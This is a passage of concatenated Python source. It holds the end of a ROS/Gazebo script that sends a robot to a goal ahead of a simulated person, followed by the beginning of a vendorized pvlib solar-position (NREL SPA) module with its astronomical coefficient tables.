def update(self, pos, orientation, linear_vel, angular_vel):
self.pos = pos
self.orientation = orientation
self.linear_vel = linear_vel
self.angular_vel = angular_vel
def calculate_ahead(self, distance):
pos = Point()
pos.x = self.pos.x + math.cos(self.orientation) * distance
pos.y = self.pos.y + math.sin(self.orientation) * distance
return pos
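# Worked example (illustrative numbers): with self.pos at (0.0, 0.0) and
# self.orientation == math.pi / 2, calculate_ahead(1.5) projects 1.5 m along
# the current heading and returns approximately (0.0, 1.5).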
def log_pose(self):
rospy.loginfo("{} position: {} orientation: {} vel(l,a): {}, {}".format(self.name, (self.pos.x, self.pos.y), self.orientation, self.linear_vel, self.angular_vel))
class BaseLine:
def __init__(self):
rospy.init_node('follow_ahead_base_line', anonymous=True)
self.reset = True
self.robot = Robot("robot")
self.person = Robot("person")
self.cmd_vel_pub = rospy.Publisher('/turtlebot1/cmd_vel', Twist, queue_size=10)
self.simple_goal_pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)
self.last_update_goal = rospy.Time.now().to_sec()
rospy.Subscriber("/gazebo/model_states", ModelStates, self.model_states_cb)
x = threading.Thread(target=self.person_trajectories, args=("person_trajectories",))
def person_trajectories(self, file_address):
pass
def model_states_cb(self, msg):
for i in range(len(msg.name)):
if msg.name[i] != "person" and msg.name[i] != "robot":
continue
pos = msg.pose[i].position
euler = Quaternion(msg.pose[i].orientation.w, msg.pose[i].orientation.x, msg.pose[i].orientation.y, msg.pose[i].orientation.z).to_euler()
orientation = euler[0]
linear_vel = msg.twist[i].linear.x
angular_vel = msg.twist[i].angular.z
if msg.name[i] == "person":
self.person.update(pos, orientation, linear_vel, angular_vel)
# self.person.log_pose()
now = rospy.Time.now().to_sec()
if (abs(self.last_update_goal - now) > 0.2):
pose_stamped = PoseStamped()
pose_stamped.header.stamp = rospy.Time.now()
pose_stamped.header.frame_id = "odom"
pose_stamped.pose.position = self.person.calculate_ahead(1.5)
pose_stamped.pose.orientation = msg.pose[i].orientation
self.simple_goal_pub.publish(pose_stamped)
self.last_update_goal = rospy.Time.now().to_sec()
rospy.loginfo("publishing ")
elif msg.name[i] == "robot":
self.robot.update(pos, orientation, linear_vel, angular_vel)
# self.robot.log_pose()
if __name__ == '__main__':
#wandb.init(project="followahead_dp")
bl = BaseLine()
# wandb.init(project="followahead_rldp")
parser = argparse.ArgumentParser(description='input weight file of the network')
rospy.spin()
|
spa.py
|
# -*- coding: utf-8 -*-
"""
spa.py from pvlib
=================
Stripped down, vendorized version from:
https://github.com/pvlib/pvlib-python/
Calculate the solar position using the NREL SPA algorithm either using
numpy arrays or compiling the code to machine language with numba.
The rationale for not including this library as a strict dependency is to avoid
a dependency on pandas, keep load time low, and retain PyPy compatibility.
Created by Tony Lorenzo (@alorenzo175), Univ. of Arizona, 2015
For a full list of contributors to this file, see the `pvlib` repository.
The copyright notice (BSD-3 clause) is as follows:
BSD 3-Clause License
Copyright (c) 2013-2018, Sandia National Laboratories and pvlib python
Development Team
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
Neither the name of the {organization} nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import division
import os
import time
from datetime import datetime
import math
from math import degrees, sin, cos, tan, radians, atan, asin, atan2, sqrt, acos
from fluids.constants import deg2rad, rad2deg
from fluids.numerics import sincos
__all__ = ['julian_day_dt', 'julian_day', 'julian_ephemeris_day', 'julian_century',
'julian_ephemeris_century', 'julian_ephemeris_millennium', 'heliocentric_longitude',
'heliocentric_latitude', 'heliocentric_radius_vector', 'geocentric_longitude',
'geocentric_latitude', 'mean_elongation', 'mean_anomaly_sun', 'mean_anomaly_moon',
'moon_argument_latitude', 'moon_ascending_longitude', 'longitude_nutation',
'obliquity_nutation', 'mean_ecliptic_obliquity', 'true_ecliptic_obliquity',
'aberration_correction', 'apparent_sun_longitude', 'mean_sidereal_time',
'apparent_sidereal_time', 'geocentric_sun_right_ascension', 'geocentric_sun_declination',
'local_hour_angle', 'equatorial_horizontal_parallax', 'uterm', 'xterm', 'yterm',
'parallax_sun_right_ascension', 'topocentric_sun_right_ascension', 'topocentric_sun_declination',
'topocentric_local_hour_angle', 'topocentric_elevation_angle_without_atmosphere',
'atmospheric_refraction_correction', 'topocentric_elevation_angle', 'topocentric_zenith_angle',
'topocentric_astronomers_azimuth', 'topocentric_azimuth_angle', 'sun_mean_longitude',
'equation_of_time', 'calculate_deltat', 'longitude_obliquity_nutation',
'transit_sunrise_sunset',
]
nan = float("nan")
HELIO_RADIUS_TABLE_LIST_0 = [[100013989.0, 0.0, 0.0],
[1670700.0, 3.0984635, 6283.07585],
[13956.0, 3.05525, 12566.1517],
[3084.0, 5.1985, 77713.7715],
[1628.0, 1.1739, 5753.3849],
[1576.0, 2.8469, 7860.4194],
[925.0, 5.453, 11506.77],
[542.0, 4.564, 3930.21],
[472.0, 3.661, 5884.927],
[346.0, 0.964, 5507.553],
[329.0, 5.9, 5223.694],
[307.0, 0.299, 5573.143],
[243.0, 4.273, 11790.629],
[212.0, 5.847, 1577.344],
[186.0, 5.022, 10977.079],
[175.0, 3.012, 18849.228],
[110.0, 5.055, 5486.778],
[98.0, 0.89, 6069.78],
[86.0, 5.69, 15720.84],
[86.0, 1.27, 161000.69],
[65.0, 0.27, 17260.15],
[63.0, 0.92, 529.69],
[57.0, 2.01, 83996.85],
[56.0, 5.24, 71430.7],
[49.0, 3.25, 2544.31],
[47.0, 2.58, 775.52],
[45.0, 5.54, 9437.76],
[43.0, 6.01, 6275.96],
[39.0, 5.36, 4694.0],
[38.0, 2.39, 8827.39],
[37.0, 0.83, 19651.05],
[37.0, 4.9, 12139.55],
[36.0, 1.67, 12036.46],
[35.0, 1.84, 2942.46],
[33.0, 0.24, 7084.9],
[32.0, 0.18, 5088.63],
[32.0, 1.78, 398.15],
[28.0, 1.21, 6286.6],
[28.0, 1.9, 6279.55],
[26.0, 4.59, 10447.39]]
HELIO_RADIUS_TABLE_LIST_1 = [[103019.0, 1.10749, 6283.07585],
[1721.0, 1.0644, 12566.1517],
[702.0, 3.142, 0.0],
[32.0, 1.02, 18849.23],
[31.0, 2.84, 5507.55],
[25.0, 1.32, 5223.69],
[18.0, 1.42, 1577.34],
[10.0, 5.91, 10977.08],
[9.0, 1.42, 6275.96],
[9.0, 0.27, 5486.78],
]
HELIO_RADIUS_TABLE_LIST_2 = [[4359.0, 5.7846, 6283.0758],
[124.0, 5.579, 12566.152],
[12.0, 3.14, 0.0],
[9.0, 3.63, 77713.77],
[6.0, 1.87, 5573.14],
[3.0, 5.47, 18849.23]]
HELIO_RADIUS_TABLE_LIST_3 = [[145.0, 4.273, 6283.076],
[7.0, 3.92, 12566.15]]
HELIO_RADIUS_TABLE_LIST_4 = [[4.0, 2.56, 6283.08]]
NUTATION_YTERM_LIST_0 = [0.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, 0.0, 0.0, -2.0, -2.0, -2.0, 0.0, 2.0, 0.0, 2.0, 0.0, 0.0, -2.0, 0.0, 2.0, 0.0, 0.0, -2.0, 0.0, -2.0, 0.0, 0.0, 2.0, -2.0, 0.0, -2.0, 0.0, 0.0, 2.0, 2.0, 0.0, -2.0, 0.0, 2.0, 2.0, -2.0, -2.0, 2.0, 2.0, 0.0, -2.0, -2.0, 0.0, -2.0, -2.0, 0.0, -1.0, -2.0, 1.0, 0.0, 0.0, -1.0, 0.0, 0.0, 2.0, 0.0, 2.0]
NUTATION_YTERM_LIST_1 = [0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 0.0, 2.0, 1.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0, 1.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, -1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, -1.0, 1.0, -1.0, -1.0, 0.0, -1.0]
NUTATION_YTERM_LIST_2 = [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, 0.0, -1.0, 0.0, 1.0, -1.0, -1.0, 1.0, 2.0, -2.0, 0.0, 2.0, 2.0, 1.0, 0.0, 0.0, -1.0, 0.0, -1.0, 0.0, 0.0, 1.0, 0.0, 2.0, -1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 2.0, 1.0, -2.0, 0.0, 1.0, 0.0, 0.0, 2.0, 2.0, 0.0, 1.0, 1.0, 0.0, 0.0, 1.0, -2.0, 1.0, 1.0, 1.0, -1.0, 3.0, 0.0]
NUTATION_YTERM_LIST_3 = [0.0, 2.0, 2.0, 0.0, 0.0, 0.0, 2.0, 2.0, 2.0, 2.0, 0.0, 2.0, 2.0, 0.0, 0.0, 2.0, 0.0, 2.0, 0.0, 2.0, 2.0, 2.0, 0.0, 2.0, 2.0, 2.0, 2.0, 0.0, 0.0, 2.0, 0.0, 0.0, 0.0, -2.0, 2.0, 2.0, 2.0, 0.0, 2.0, 2.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0, 2.0, 0.0, 2.0, 0.0, 2.0, -2.0, 0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 2.0, 2.0, 2.0, 2.0]
NUTATION_YTERM_LIST_4 = [1.0, 2.0, 2.0, 2.0, 0.0, 0.0, 2.0, 1.0, 2.0, 2.0, 0.0, 1.0, 2.0, 0.0, 1.0, 2.0, 1.0, 1.0, 0.0, 1.0, 2.0, 2.0, 0.0, 2.0, 0.0, 0.0, 1.0, 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 0.0, 1.0, 2.0, 2.0, 0.0, 2.0, 1.0, 0.0, 2.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 0.0, 0.0, 2.0, 2.0, 2.0, 2.0]
NUTATION_ABCD_LIST = [[-171996.0, -174.2, 92025.0, 8.9],
[-13187.0, -1.6, 5736.0, -3.1],
[-2274.0, -0.2, 977.0, -0.5],
[2062.0, 0.2, -895.0, 0.5],
[1426.0, -3.4, 54.0, -0.1],
[712.0, 0.1, -7.0, 0.0],
[-517.0, 1.2, 224.0, -0.6],
[-386.0, -0.4, 200.0, 0.0],
[-301.0, 0.0, 129.0, -0.1],
[217.0, -0.5, -95.0, 0.3],
[-158.0, 0.0, 0.0, 0.0],
[129.0, 0.1, -70.0, 0.0],
[123.0, 0.0, -53.0, 0.0],
[63.0, 0.0, 0.0, 0.0],
[63.0, 0.1, -33.0, 0.0],
[-59.0, 0.0, 26.0, 0.0],
[-58.0, -0.1, 32.0, 0.0],
[-51.0, 0.0, 27.0, 0.0],
[48.0, 0.0, 0.0, 0.0],
[46.0, 0.0, -24.0, 0.0],
[-38.0, 0.0, 16.0, 0.0],
[-31.0, 0.0, 13.0, 0.0],
[29.0, 0.0, 0.0, 0.0],
[29.0, 0.0, -12.0, 0.0],
[26.0, 0.0, 0.0, 0.0],
[-22.0, 0.0, 0.0, 0.0],
[21.0, 0.0, -10.0, 0.0],
[17.0, -0.1, 0.0, 0.0],
[16.0, 0.0, -8.0, 0.0],
[-16.0, 0.1, 7.0, 0.0],
[-15.0, 0.0, 9.0, 0.0],
[-13.0, 0.0, 7.0, 0.0],
[-12.0, 0.0, 6.0, 0.0],
[11.0, 0.0, 0.0, 0.0],
[-10.0, 0.0, 5.0, 0.0],
[-8.0, 0.0, 3.0, 0.0],
[7.0, 0.0, -3.0, 0.0],
[-7.0, 0.0, 0.0, 0.0],
[-7.0, 0.0, 3.0, 0.0],
[-7.0, 0.0, 3.0, 0.0],
[6.0, 0.0, 0.0, 0.0],
[6.0, 0.0, -3.0, 0.0],
[6.0, 0.0, -3.0, 0.0],
[-6.0, 0.0, 3.0, 0.0],
[-6.0, 0.0, 3.0, 0.0],
[5.0, 0.0, 0.0, 0.0],
[-5.0, 0.0, 3.0, 0.0],
[-5.0, 0.0, 3.0, 0.0],
[-5.0, 0.0, 3.0, 0.0],
[4.0, 0.0, 0.0, 0.0],
[4.0, 0.0, 0.0, 0.0],
[4.0, 0.0, 0.0, 0.0],
[-4.0, 0.0, 0.0, 0.0],
[-4.0, 0.0, 0.0, 0.0],
[-4.0, 0.0, 0.0, 0.0],
[3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0]]
HELIO_LAT_TABLE_LIST_0 = [[280.0, 3.199, 84334.662],
[102.0, 5.422, 5507.553],
[80.0, 3.88, 5223.69],
[44.0, 3.7, 2352.87],
[32.0, 4.0, 1577.34]]
HELIO_LAT_TABLE_LIST_1 = [[9.0, 3.9, 5507.55],
[6.0, 1.73, 5223.69]]
#HELIO_LONG_TABLE_LIST = HELIO_LONG_TABLE.tolist()
HELIO_LONG_TABLE_LIST_0 = [[175347046.0, 0.0, 0.0],
[3341656.0, 4.6692568, 6283.07585],
[34894.0, 4.6261, 12566.1517],
[3497.0, 2.7441, 5753.3849],
[3418.0, 2.8289, 3.5231],
[3136.0, 3.6277, 77713.7715],
[2676.0, 4.4181, 7860.4194],
[2343.0, 6.1352, 3930.2097],
[1324.0, 0.7425, 11506.7698],
[1273.0, 2.0371, 529.691],
[1199.0, 1.1096, 1577.3435],
[990.0, 5.233, 5884.927],
[902.0, 2.045, 26.298],
[857.0, 3.508, 398.149],
[780.0, 1.179, 5223.694],
[753.0, 2.533, 5507.553],
[505.0, 4.583, 18849.228],
[492.0, 4.205, 775.523],
[357.0, 2.92, 0.067],
[317.0, 5.849, 11790.629],
[284.0, 1.899, 796.298],
[271.0, 0.315, 10977.079],
[243.0, 0.345, 5486.778],
[206.0, 4.806, 2544.314],
[205.0, 1.869, 5573.143],
[202.0, 2.458, 6069.777],
[156.0, 0.833, 213.299],
[132.0, 3.411, 2942.463],
[126.0, 1.083, 20.775],
[115.0, 0.645, 0.98],
[103.0, 0.636, 4694.003],
[102.0, 0.976, 15720.839],
[102.0, 4.267, 7.114],
[99.0, 6.21, 2146.17],
[98.0, 0.68, 155.42],
[86.0, 5.98, 161000.69],
[85.0, 1.3, 6275.96],
[85.0, 3.67, 71430.7],
[80.0, 1.81, 17260.15],
[79.0, 3.04, 12036.46],
[75.0, 1.76, 5088.63],
[74.0, 3.5, 3154.69],
[74.0, 4.68, 801.82],
[70.0, 0.83, 9437.76],
[62.0, 3.98, 8827.39],
[61.0, 1.82, 7084.9],
[57.0, 2.78, 6286.6],
[56.0, 4.39, 14143.5],
[56.0, 3.47, 6279.55],
[52.0, 0.19, 12139.55],
[52.0, 1.33, 1748.02],
[51.0, 0.28, 5856.48],
[49.0, 0.49, 1194.45],
[41.0, 5.37, 8429.24],
[41.0, 2.4, 19651.05],
[39.0, 6.17, 10447.39],
[37.0, 6.04, 10213.29],
[37.0, 2.57, 1059.38],
[36.0, 1.71, 2352.87],
[36.0, 1.78, 6812.77],
[33.0, 0.59, 17789.85],
[30.0, 0.44, 83996.85],
[30.0, 2.74, 1349.87],
[25.0, 3.16, 4690.48]]
HELIO_LONG_TABLE_LIST_1 = [[628331966747.0, 0.0, 0.0],
[206059.0, 2.678235, 6283.07585],
[4303.0, 2.6351, 12566.1517],
[425.0, 1.59, 3.523],
[119.0, 5.796, 26.298],
[109.0, 2.966, 1577.344],
[93.0, 2.59, 18849.23],
[72.0, 1.14, 529.69],
[68.0, 1.87, 398.15],
[67.0, 4.41, 5507.55],
[59.0, 2.89, 5223.69],
[56.0, 2.17, 155.42],
[45.0, 0.4, 796.3],
[36.0, 0.47, 775.52],
[29.0, 2.65, 7.11],
[21.0, 5.34, 0.98],
[19.0, 1.85, 5486.78],
[19.0, 4.97, 213.3],
[17.0, 2.99, 6275.96],
[16.0, 0.03, 2544.31],
[16.0, 1.43, 2146.17],
[15.0, 1.21, 10977.08],
[12.0, 2.83, 1748.02],
[12.0, 3.26, 5088.63],
[12.0, 5.27, 1194.45],
[12.0, 2.08, 4694.0],
[11.0, 0.77, 553.57],
[10.0, 1.3, 6286.6],
[10.0, 4.24, 1349.87],
[9.0, 2.7, 242.73],
[9.0, 5.64, 951.72],
[8.0, 5.3, 2352.87],
[6.0, 2.65, 9437.76],
[6.0, 4.67, 4690.48],
]
HELIO_LONG_TABLE_LIST_2 = [[52919.0, 0.0, 0.0],
[8720.0, 1.0721, 6283.0758],
[309.0, 0.867, 12566.152],
[27.0, 0.05, 3.52],
[16.0, 5.19, 26.3],
[16.0, 3.68, 155.42],
[10.0, 0.76, 18849.23],
[9.0, 2.06, 77713.77],
[7.0, 0.83, 775.52],
[5.0, 4.66, 1577.34],
[4.0, 1.03, 7.11],
[4.0, 3.44, 5573.14],
[3.0, 5.14, 796.3],
[3.0, 6.05, 5507.55],
[3.0, 1.19, 242.73],
[3.0, 6.12, 529.69],
[3.0, 0.31, 398.15],
[3.0, 2.28, 553.57],
[2.0, 4.38, 5223.69],
[2.0, 3.75, 0.98]]
HELIO_LONG_TABLE_LIST_3 = [[289.0, 5.844, 6283.076],
[35.0, 0.0, 0.0],
[17.0, 5.49, 12566.15],
[3.0, 5.2, 155.42],
[1.0, 4.72, 3.52],
[1.0, 5.3, 18849.23],
[1.0, 5.97, 242.73]
]
HELIO_LONG_TABLE_LIST_4 = [[114.0, 3.142, 0.0],
[8.0, 4.13, 6283.08],
[1.0, 3.84, 12566.15]]
def julian_day_dt(year, month, day, hour, minute, second, microsecond):
"""This is the original way to calculate the julian day from the NREL paper.
However, it is much faster to convert to unix/epoch time and then convert to
julian day. Note that the date must be UTC.
"""
# Not used anywhere!
if month <= 2:
year = year-1
month = month+12
a = int(year/100)
b = 2 - a + int(a * 0.25)
frac_of_day = (microsecond + (second + minute * 60 + hour * 3600)
) * 1.0 / (3600*24)
d = day + frac_of_day
jd = (int(365.25 * (year + 4716)) + int(30.6001 * (month + 1)) + d +
b - 1524.5)
return jd
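# Hand check of the formula above (illustrative date): for 2020-01-01 00:00:00 UTC,
# julian_day_dt(2020, 1, 1, 0, 0, 0, 0) evaluates to 2458849.5, which matches the
# unix-time based julian_day() below.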
def julian_day(unixtime):
jd = unixtime*1.1574074074074073e-05 + 2440587.5
# jd = unixtime/86400.0 + 2440587.5
return jd
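# Same date via unix time as a quick sketch: 1577836800 s is 2020-01-01 00:00:00 UTC,
# and julian_day(1577836800) = 1577836800/86400.0 + 2440587.5 = 2458849.5
# (up to floating-point rounding).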
def julian_ephemeris_day(julian_day, delta_t):
jde = julian_day + delta_t*1.1574074074074073e-05
# jde = julian_day + delta_t * 1.0 / 86400.0
return jde
def julian_century(julian_day):
jc = (julian_day - 2451545.0)*2.7378507871321012e-05# * 1.0 / 36525
return jc
def julian_ephemeris_century(julian_ephemeris_day):
# 1/36525.0 = 2.7378507871321012e-05
jce = (julian_ephemeris_day - 2451545.0)*2.7378507871321012e-05
return jce
def julian_ephemeris_millennium(julian_ephemeris_century):
jme = julian_ephemeris_century*0.1
return jme
def heliocentric_longitude(jme):
# Might be able to replace this with a pade approximation?
# Looping over rows is probably still faster than (a, b, c)
# Maximum optimization
l0 = 0.0
l1 = 0.0
l2 = 0.0
l3 = 0.0
l4 = 0.0
l5 = 0.0
for row in range(64):
HELIO_LONG_TABLE_LIST_0_ROW = HELIO_LONG_TABLE_LIST_0[row]
l0 += (HELIO_LONG_TABLE_LIST_0_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_0_ROW[1]
+ HELIO_LONG_TABLE_LIST_0_ROW[2] * jme)
)
for row in range(34):
HELIO_LONG_TABLE_LIST_1_ROW = HELIO_LONG_TABLE_LIST_1[row]
l1 += (HELIO_LONG_TABLE_LIST_1_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_1_ROW[1]
+ HELIO_LONG_TABLE_LIST_1_ROW[2] * jme)
)
for row in range(20):
HELIO_LONG_TABLE_LIST_2_ROW = HELIO_LONG_TABLE_LIST_2[row]
l2 += (HELIO_LONG_TABLE_LIST_2_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_2_ROW[1]
+ HELIO_LONG_TABLE_LIST_2_ROW[2] * jme)
)
for row in range(7):
HELIO_LONG_TABLE_LIST_3_ROW = HELIO_LONG_TABLE_LIST_3[row]
l3 += (HELIO_LONG_TABLE_LIST_3_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_3_ROW[1]
+ HELIO_LONG_TABLE_LIST_3_ROW[2] * jme)
)
for row in range(3):
HELIO_LONG_TABLE_LIST_4_ROW = HELIO_LONG_TABLE_LIST_4[row]
l4 += (HELIO_LONG_TABLE_LIST_4_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_4_ROW[1]
+ HELIO_LONG_TABLE_LIST_4_ROW[2] * jme)
)
# l5 = (HELIO_LONG_TABLE_LIST_5[0][0]*cos(HELIO_LONG_TABLE_LIST_5[0][1]))
l5 = -0.9999987317275395
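# Horner evaluation of (l0 + l1*jme + l2*jme**2 + ... + l5*jme**5)*1E-8, giving
# the heliocentric longitude in radians before the degree conversion below.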
l_rad = (jme*(jme*(jme*(jme*(jme*l5 + l4) + l3) + l2) + l1) + l0)*1E-8
l = rad2deg*l_rad
return l % 360
def heliocentric_latitude(jme):
b0 = 0.0
b1 = 0.0
for row in range(5):
HELIO_LAT_TABLE_LIST_0_ROW = HELIO_LAT_TABLE_LIST_0[row]
b0 += (HELIO_LAT_TABLE_LIST_0_ROW[0]
* cos(HELIO_LAT_TABLE_LIST_0_ROW[1]
+ HELIO_LAT_TABLE_LIST_0_ROW[2] * jme)
)
HELIO_LAT_TABLE_LIST_1_ROW = HELIO_LAT_TABLE_LIST_1[0]
b1 += (HELIO_LAT_TABLE_LIST_1_ROW[0]
* cos(HELIO_LAT_TABLE_LIST_1_ROW[1]
+ HELIO_LAT_TABLE_LIST_1_ROW[2] * jme))
HELIO_LAT_TABLE_LIST_1_ROW = HELIO_LAT_TABLE_LIST_1[1]
b1 += (HELIO_LAT_TABLE_LIST_1_ROW[0]
* cos(HELIO_LAT_TABLE_LIST_1_ROW[1]
+ HELIO_LAT_TABLE_LIST_1_ROW[2] * jme))
b_rad = (b0 + b1 * jme)*1E-8
b = rad2deg*b_rad
return b
def heliocentric_radius_vector(jme):
# no optimizations can be thought of
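# The return value is the Earth heliocentric radius vector in astronomical
# units; the leading constant term (100013989.0*1E-8, about 1.00014) reflects
# the mean Earth-Sun distance of roughly 1 AU.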
r0 = 0.0
r1 = 0.0
r2 = 0.0
r3 = 0.0
r4 = 0.0
# Would be possible to save a few multiplies of table1row[2]*jme, table1row[1]*jme as they are dups
for row in range(40):
table0row = HELIO_RADIUS_TABLE_LIST_0[row]
r0 += (table0row[0]*cos(table0row[1] + table0row[2]*jme))
for row in range(10):
table1row = HELIO_RADIUS_TABLE_LIST_1[row]
r1 += (table1row[0]*cos(table1row[1] + table1row[2]*jme))
for row in range(6):
table2row = HELIO_RADIUS_TABLE_LIST_2[row]
r2 += (table2row[0]*cos(table2row[1] + table2row[2]*jme))
table3row = HELIO_RADIUS_TABLE_LIST_3[0]
r3 += (table3row[0]*cos(table3row[1] + table3row[2]*jme))
table3row = HELIO_RADIUS_TABLE_LIST_3[1]
r3 += (table3row[0]*cos(table3row[1] + table3row[2]*jme))
# table4row = HELIO_RADIUS_TABLE_LIST_4[0]
# r4 = (table4row[0]*cos(table4row[1] + table4row[2]*jme))
r4 = (4.0*cos(2.56 + 6283.08*jme))
return (jme*(jme*(jme*(jme*r4 + r3) + r2) + r1) + r0)*1E-8
def geocentric_longitude(heliocentric_longitude):
theta = heliocentric_longitude + 180.0
return theta % 360
def geocentric_latitude(heliocentric_latitude):
beta = -heliocentric_latitude
return beta
def mean_elongation(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century
*(5.27776898149614e-6*julian_ephemeris_century - 0.0019142)
+ 445267.11148) + 297.85036)
# x0 = (297.85036
# + 445267.111480 * julian_ephemeris_century
# - 0.0019142 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 189474.0)
# return x0
def mean_anomaly_sun(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century*(
-3.33333333333333e-6*julian_ephemeris_century - 0.0001603)
+ 35999.05034) + 357.52772)
# x1 = (357.52772
# + 35999.050340 * julian_ephemeris_century
# - 0.0001603 * julian_ephemeris_century**2
# - julian_ephemeris_century**3 / 300000.0)
# return x1
def mean_anomaly_moon(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century*(
1.77777777777778e-5*julian_ephemeris_century + 0.0086972)
+ 477198.867398) + 134.96298)
# x2 = (134.96298
# + 477198.867398 * julian_ephemeris_century
# + 0.0086972 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 56250)
# return x2
def moon_argument_latitude(julian_ephemeris_century):
return julian_ephemeris_century*(julian_ephemeris_century*(
3.05558101873071e-6*julian_ephemeris_century - 0.0036825)
+ 483202.017538) + 93.27191
# x3 = (93.27191
# + 483202.017538 * julian_ephemeris_century
# - 0.0036825 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 327270)
# return x3
def moon_ascending_longitude(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century*(
2.22222222222222e-6*julian_ephemeris_century + 0.0020708)
- 1934.136261) + 125.04452)
# x4 = (125.04452
# - 1934.136261 * julian_ephemeris_century
# + 0.0020708 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 450000)
# return x4
def longitude_obliquity_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
x0, x1, x2, x3, x4 = deg2rad*x0, deg2rad*x1, deg2rad*x2, deg2rad*x3, deg2rad*x4
delta_psi_sum = 0.0
delta_eps_sum = 0.0
# If the sincos formulation is used, the speed up is ~8% with numba.
for row in range(63):
arg = (NUTATION_YTERM_LIST_0[row]*x0 +
NUTATION_YTERM_LIST_1[row]*x1 +
NUTATION_YTERM_LIST_2[row]*x2 +
NUTATION_YTERM_LIST_3[row]*x3 +
NUTATION_YTERM_LIST_4[row]*x4)
arr = NUTATION_ABCD_LIST[row]
sinarg, cosarg = sincos(arg)
# sinarg = sin(arg)
# cosarg = sqrt(1.0 - sinarg*sinarg)
t0 = (arr[0] + julian_ephemeris_century*arr[1])
delta_psi_sum += t0*sinarg
# delta_psi_sum += t0*sin(arg)
t0 = (arr[2] + julian_ephemeris_century*arr[3])
delta_eps_sum += t0*cosarg
# delta_eps_sum += t0*cos(arg)
delta_psi = delta_psi_sum/36000000.0
delta_eps = delta_eps_sum/36000000.0
res = [0.0]*2
res[0] = delta_psi
res[1] = delta_eps
return res
def longitude_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
x0, x1, x2, x3, x4 = deg2rad*x0, deg2rad*x1, deg2rad*x2, deg2rad*x3, deg2rad*x4
delta_psi_sum = 0.0
for row in range(63):
# # None can be skipped but the multiplies can be with effort -2 to 2 with dict - just might be slower
argsin = (NUTATION_YTERM_LIST_0[row]*x0 +
NUTATION_YTERM_LIST_1[row]*x1 +
NUTATION_YTERM_LIST_2[row]*x2 +
NUTATION_YTERM_LIST_3[row]*x3 +
NUTATION_YTERM_LIST_4[row]*x4)
term = (NUTATION_ABCD_LIST[row][0] + NUTATION_ABCD_LIST[row][1]
* julian_ephemeris_century)*sin(argsin)
delta_psi_sum += term
delta_psi = delta_psi_sum/36000000.0
return delta_psi
def obliquity_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
delta_eps_sum = 0.0
x0, x1, x2, x3, x4 = deg2rad*x0, deg2rad*x1, deg2rad*x2, deg2rad*x3, deg2rad*x4
for row in range(63):
argcos = (NUTATION_YTERM_LIST_0[row]*x0 +
NUTATION_YTERM_LIST_1[row]*x1 +
NUTATION_YTERM_LIST_2[row]*x2 +
NUTATION_YTERM_LIST_3[row]*x3 +
NUTATION_YTERM_LIST_4[row]*x4)
term = (NUTATION_ABCD_LIST[row][2]
+ NUTATION_ABCD_LIST[row][3]*julian_ephemeris_century)*cos(argcos)
delta_eps_sum += term
delta_eps = delta_eps_sum/36000000.0
return delta_eps
def mean_ecliptic_obliquity(julian_ephemeris_millennium):
